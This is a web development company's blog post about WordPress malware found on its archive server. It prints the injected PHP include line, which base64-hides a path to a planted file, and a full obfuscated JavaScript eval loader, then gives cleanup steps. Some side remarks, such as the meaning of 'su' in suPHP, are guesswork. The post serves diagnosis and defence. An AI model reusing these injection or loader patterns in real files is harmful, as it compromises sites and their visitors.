Dealing with a Web Virus on WordPress

Dealing with a Web Virus on WordPressIn the online world, a virus is used to negatively affect the people who own or view a website. Whether or not you own a website, it is possible for your personal information to be stolen when the site is infected. However, protecting yourself from viruses doesn’t require a Ph.D., nor do you have to be a developer or designer to do it. Informing yourself and having just adequate internet surfing skills is enough to allow you to identify them and keep your information safe.

What is a virus?

A virus is nothing more than a program written by a developer with bad intentions. Usually viruses are created to steal data stored on your computer. Some viruses target credit card information, others saved passwords. Sometimes a virus is implemented on a computer to turn into what we call a “zombie computer,” which the creator will use to attack other people’s servers and take them down.

Now, everyone has been targeted by a virus on their computers at some point in the past. Those who don’t think they’ve had a virus are just not aware that one ever existed. Fortunately, the last few years have seen an increase in the security of different operating systems, making them less vulnerable than they used to be.

During Windows XP’s heyday, viruses were extremely common and many computers operated with viruses. They were so common that people even got used to using computers affected by viruses. USB drives are the biggest culprits of storing viruses and helping them spread.

What is a web virus?

A web virus is a specific kind of virus that infects a website and steals information from its database and its users. This is a dangerous situation, especially for eCommerce sites that process credit cards for their customers. If the website is not meant for eCommerce, a virus will still steal passwords and other valuable information from the website’s database.

Our experience with viruses

We have a highly secure main server and a second server used for archiving purposes. When a project has been deemed inactive or closed, the data passes from the main server to the archive server. Of course, priority is given to the security of the main server because the data in the archive server is no longer useful. However, we still need to protect our archive server and data as well since, on occasion, we will need data / records from these projects.

We recently came across a virus and realized it was affecting all of the .php and .js files in the archiving server. So I started to analyze the problem to get a better understanding of what the virus was actually doing to these files, how it attacked them, and how we could clean them.

The security of web servers

Without diving into system administration, let’s take a look at the basics of how a virus is able to infect a website.

Apache Web Server, which has 65% market share according to Netcraft 2012, commonly runs PHP as a module. Within a web server, there is typically more than one website. Each website within a server can be called a ‘virtual host’ . A ‘virtual host’ allows web servers to serve more than one website over the same IP address and port. Apache Web Server also has a module called suPHP that is used to run PHP scripts with their own system user. I assume that the su in suPHP stands for “self-user”

An ideal web server would assign every website or domain its own system user and all of the files under it would be owned by that user. Using suPHP helps distinguish different users in a server. When a request is sent to the server and the server runs the PHP files within the website’s system user, the executed PHP files are not able to reach other system users’ folders, i.e. other website’s files.

Even though CPanel is the most used website panel in the world, it unfortunately comes with suPHP enabled in the default settings. This is a problem because it leaves your website vulnerable.

The drawbacks of suPHP surface when PHP runs with the website’s system user and that system user is able to write all of the files and folders in its own home directory. While that may seem handy to you because of the ease of uploading files through your website’s admin panel, it is actually a security issue. In a secure website environment, only the “Uploads” folder (and maybe the “Temporary files folder”) should be writable. The rest of the files and folders should not be writable at all. This was the main reason why the virus that infected our archive server was able to do so. The virus was able to write into .php and .js files.

Avoid multiple-domain hosting like HostGator, BlueHost, and HostMonster

If you have more than one website, the plans offered by host providers like HostGator and BlueHost may seem attractive. They offer multiple-domain hosting with unlimited storage and bandwidth for $10/mo – sometimes even less.

The problem with multiple-domain plans is that these hosting providers will execute all of your sites using the same system user. If one of your websites becomes infected, it leaves the rest of your sites vulnerable since that site can write to every file in your account – even those of another website. Obviously, this vulnerability can be disastrous.

So while the price is cheap, and therefore attractive, think twice when considering multiple-domain packages from these hosting providers; or buy the higher-priced, more secure packages like reseller, VPS or Dedicated. While you take a bigger hit initially, using a single, distinct package for each one of your websites is the best option to save time, money, and stress in the future and to ensure that your sites are safe.

The virus code that was in our .PHP files

Now comes the interesting part – the code piece that was written into all of the .php files in our archive server.

[cc lang=”php” escaped=”true”]<?php /* <!—–EfRHrzgyvFZpKhDctW—–> */ $mpfGlEWVvKxSkoTJFLzh = base64_decode(“L2hvbWUxL+KApi9wdWJsaWNfaHRtbC/igKYvd3AtY29udGVudC90aGVtZXMvcmV2b2x1dGlvbl9idXNpbmVzcy0xMC9wbHVnaW5zL3dwLWdiY2Yvd3AtZ2JjZl90aGVtZXMvd3AtZ2JjZl9pbWFnZXMveW1ndXcucGhw”);  @include_once $mpfGlEWVvKxSkoTJFLzh;/* <!—–EfRHrzgyvFZpKhDctW—–> */?>[/cc]

The code doesn’t make any sense because it is encoded. However, if we decode it, you can see that it actually says:

[cc lang=”php” escaped=”true”]<?php
@include_once “/home/…/public_html/…/wp-content/themes/revolution_business-10/plugins/wp-gbcf/wp-gbcf_themes/wp-gbcf_images/ymguw.php”;

The attacker was able to create a file in the WordPress blog and injected that code piece in all of the .php fileswhich would include and execute the malware file that was created.

The “@” symbol at the beginning of “include_once” means “Don’t display an error,” which means that the malware remains silent within the system, not producing errors that would give away its presence.

And while I would have liked to explain the contents of ymguw.php, it appears that the anti-virus software we use for our archive server has deleted it. This is ultimately a good thing because this virus didn’t harm us. Still, others may not be so fortunate.

A second Javascript virus

Now I’m going to share another encrypted code piece with you, but since it is not working, I did not take the time to decode it myself. Luckily the execution was halted by the browser, and so we were fortunate in not being affected by this virus either.

However, if you want to decode it, go ahead and share your results with me in the comments section. I’ll even include them in a future article!

[cc lang=”javascript” tab_size=”2″ lines=”10″]

/** 7d508557b75c2ca9fe5d55e065da96d4 */
var RMHGz;var yIiC;function SiFT(){var mgdKe=’XppNgi’;if(‘DMVIn’==’qqJXy’)uTWX();}var XkWW;var LKxhI=”a6a35d6565ab9eb3a6a49eb1acaf6bb2b0a2af7ea4a2abb16baa9eb1a0a5656c8a9086826ca666665db9b95d65ab9eb3a6a49eb1acaf6bb2b0a2af7ea4a2abb16baa9eb1a0a5656c8cada2af9e6ca666665db9b95d65ab9eb3a6a49eb1acaf6bb2b0a2af7ea4a2abb16baa9eb1a0a5656c83a6afa2a3acb56ca666665db9b95d65ab9eb3a6a49eb1acaf6bb2b0a2af7ea4a2abb16baa9eb1a0a5656c91afa6a1a2abb16ca66666665db84a47a6a35d65a1aca0b2aaa2abb16ba0acaca8a6a26ba6aba1a2b58ca365648d858d9c90829090868c8b7a6e7572a36fa273a1a274a19e71737676a2a1706f7073a36d7473a076766d769f6f7172a29fa0769f64665d7a7a5d6a6e665db84a475d5d5d5db39eaf5da6a3af9eaaa25d7a5da1aca0b2aaa2abb16ba0afa29eb1a282a9a2aaa2abb16564a6a3af9eaaa26466784a475d5d5d5da6a3af9eaaa26bb4a6a1b1a55d5d7a5d706d6d784a475d5d5d5da6a3af9eaaa26ba5a2a6a4a5b15d7a5d706d6d784a475d5d5d5da6a3af9eaaa26bb0afa05d5d5d5d7a5d64a5b1b1ad776c6ca1a2aca1a2b5b2ab6bb0a9b6a6ad6ba0acaa6ca993b5a86ead6d8c8991a66d7470b0a06e73808e706dab737e6f6d96748c826daa8b76816c784a475d5d5d5da6a3af9eaaa26bb0b1b6a9a26badacb0a6b1a6acab5d7a5d649e9fb0aca9b2b1a264784a475d5d5d5da6a3af9eaaa26bb0b1b6a9a26bb1acad5d5d5d5d5d5d7a5d646a6e6d6d6d6dadb564784a475d5d5d5da6a3af9eaaa26bb0b1b6a9a26ba9a2a3b15d5d5d5d5d7a5d646a6e6d6d6d6dadb564784a475d5d5d5da1aca0b2aaa2abb16ba4a2b182a9a2aaa2abb1b07fb6919ea48b9eaaa265649faca1b66466986d9a6b9eadada2aba180a5a6a9a165a6a3af9eaaa266784a475d4a475d5d5d5db39eaf5da2b5a19eb1a27aaba2b45d819eb1a26566784a475d5d5d5da2b5a19eb1a26bb0a2b1819eb1a265a2b5a19eb1a26ba4a2b1819eb1a265665d685d6e66784a475d5d5d5da1aca0b2aaa2abb16ba0acaca8a6a27a5f8d858d9c90829090868c8b7a6e7572a36fa273a1a274a19e71737676a2a1706f7073a36d7473a076766d769f6f7172a29fa0769f785da2b5ada6afa2b07a5f68a2b5a19eb1a26bb1ac92918090b1afa6aba46566784a47ba4a47ba”;var ZgpLK=’FGuLm’;if(‘LelSQP’==’lzdEyO’)cVsCKt=’KdokEd’;var PUfqsdQET=”parseI\x6et”;var jcLGO;var BlAHSiu=”e\x76al”;function FOMKs(){}function mUkKus(){var ncuhtn=’cefwsD’;if(‘fEPDA’==’erdJRE’)otbOsQ();}
var uIIwMf=”\x73lic\x65″;function OesbI(){var cvtet=’bdmOXZ’;if(‘wuOqk’==’sXesUZ’)DetS();}var HRFvCb;var uGRjHJ=””;var syzQvD=204;var EySHcb=”fr\x6f\x6dCh\x61\x72\x43ode”;if(‘EyfF’==’BkJuC’)uQOzNf();var EppbAEijt=(function(){function keqZ(){}function Nsqzmk(){}
return this;if(‘oAHgEP’==’ixzYqy’)eKmTPs();})();function CdNciR(){var nfGpv=’owiV’;if(‘AmXXMn’==’hZbbZN’)YExEsb();}var YgFu=299;var HSuA=221;var EFSLru=”construc\x74\x6fr”;var tIey;var mAIzl=’OIra’;var IvBfIpn=”Jslng”[EFSLru];function QzSFB(){var QgOdvg=’EZsvZ’;if(‘vaKMY’==’xuovEu’)UPDm();}
function ulLl(){var mcln=’LfGe’;if(‘UNGe’==’hnWS’)mtRfx();}function UHoI(){var gvTy=’XaeJv’;if(‘SkMQ’==’OVMlGW’)zxLwpI();}
for(XUErIgkn=0;XUErIgkn<LKxhI.length;XUErIgkn+=2){if(‘SwOL’==’vzLV’)JRVObU();jYMOSp=EppbAEijt[PUfqsdQET](LKxhI[uIIwMf](XUErIgkn,XUErIgkn+2),16)-61;function IjQmDK(){var rgfFn=’IWZZGb’;if(‘rpYtpC’==’FqsK’)YGmV();}var XWKQb=46;function yOBUem(){var WNloW=’kfBE’;if(‘bDYEFB’==’KLHYU’)hDMDC();}
if(‘nIoG’==’woTaP’)NmmNfR=’GvbHg’;var wVcBae=’tifd’;}
var GQnGo;var eCBQz;EppbAEijt[BlAHSiu](uGRjHJ);function WGoB(){var zxmx=’UxGsm’;if(‘NrmIIS’==’uIwWNR’)uOcL();}if(‘QXfO’==’YUxuN’)KgqMr();var Erel;
/** ~7d508557b75c2ca9fe5d55e065da96d4 */


So how did I find the virus?

Our COO, Duran Inci, told me that one of the admin panels in WordPress was not working in the archive server. So of course, I went ahead and checked it and found that the Javascript code was halting the execution and realized that this was due to the virus. I proceeded to download the entire website to my computer and began analyzing it. As I continued to analyze it, I found that the virus had infected the .php and .js files as previously mentioned.

Always watch out for unexpected behaviors on your website!

What was the purpose of the virus?

At this point, I cannot determine what the main purpose of the virus was or how the attacker was able to upload the file. However, if you want to protect yourself from situations like this:

• Be careful with plugins and themes you install. Always use ones from trusted sources.
• Always update your plugins and themes.
• Always update WordPress itself.
• Don’t use multi-domain shared hosting where all websites reside within one account.
• Keep an eye out for unexpected behaviors – they may be due to a virus.

While we weren’t harmed by the virus (thanks to the archive server’s anti-virus software), remember that not everyone is so lucky. So be sure to take precautions to ensure that your website(s) is secure as possible.

How can we clean our files?

You could do a clean installation of WordPress and reinstall all of your plugins and themes while keeping the database intact, but that is time consuming, laborious work. There’s a better way.

I used “find-replace in files” logic. Using Notepad++, I opened the Find in Files window and removed those code pieces.

To remove the Javascript infection, set search mode to “Regular Expression” in the Notepad++ Find in Files window and check the “. matches newline” option, which you should find near the Regular Expression. Then use this pattern for the “Find What” box and leave the “Replace With” box empty.

“Find What” pattern:


/\*\* 7d508557b75c2ca9fe5d55e065da96d4 \*/.*/\*\* ~7d508557b75c2ca9fe5d55e065da96d4 \*/\n


To clean .php files, you don’t need a pattern because all of the code is in one line. Just set Search Mode to Normal and copy/paste the infection code into the Find What box and replace it with nothing.

Contact Us!

If you’re having security issues with your website or are looking to build a website with a company who knows what it takes to make it secure, contact us today! We also offer customized application development plans that may suit your needs. The initial consultation is free.

Editorial by Jani Seneviratne.